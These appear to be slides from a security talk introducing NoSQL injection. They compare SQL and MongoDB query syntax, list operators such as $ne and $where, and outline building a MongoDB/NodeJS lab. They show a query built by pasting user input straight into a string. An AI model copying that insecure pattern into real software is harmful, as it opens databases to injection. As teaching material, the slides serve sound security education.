3. Agenda
SQL vs NoSQL Databases
NoSQL Injection
LAB Creation
LAB Walkthrough
Insecure Coding and secure coding
CVE and exploits
4. Why NoSql Database ?
A relational database may require vertical and, sometimes horizontal expansion
of servers. What you require is a very agile delivery system that is easily
able to processes unstructured data. The system of engagement would need to be
extremely dynamic.
NoSQL allows for high-performance, agile processing of information at massive
scale. It stores unstructured data across multiple processing nodes, as well
as across multiple servers.
1. Key value Stores —> Riak, Voldemort, and Redis
2. Wide Column Stores —> Cassandra and HBase.
3. Document databases —> MongoDB and CouchDB.
4. Graph databases —> Neo4J and HyperGraphDB.
6. Query Structure
SQL:
SELECT * FROM table WHERE username = ‘$username’ AND password = ‘$password’
NoSQL:
db.collection.find({username: “$username”, password: “$password”});
Query Operators in NoSQL:
$ne -> not equal
$gt -> greater than
$regex -> regular expression
$where -> clause lets you specify a script to filter results
7. NoSQL Injection
NoSQL Injection is security vulnerability that lets attackers take control
of database queries through the unsafe use of user input. It can be used
by an attacker to: Expose unauthorized information. Modify data.
➢ db.items.find(queryObject)
○ db — current database object
○ Items — collection names ‘items’ in the current database
○ find — method to execute on the collection
○ queryObject — an object used to select data
8. LAB Creation
In this NoSQL Lab, I have implemented lab with actual and possible attack
scenarios.
1
VM LAB
Use Alpine or Ubuntu system
as per requirement.
Installed Dependencies
MongoDB and NodeJS
Installation.
2
Build Code
Create possible scenarios of
attack and write the code.
3
Run & Test
Deploy the code and try to
bypass the mechanism.
4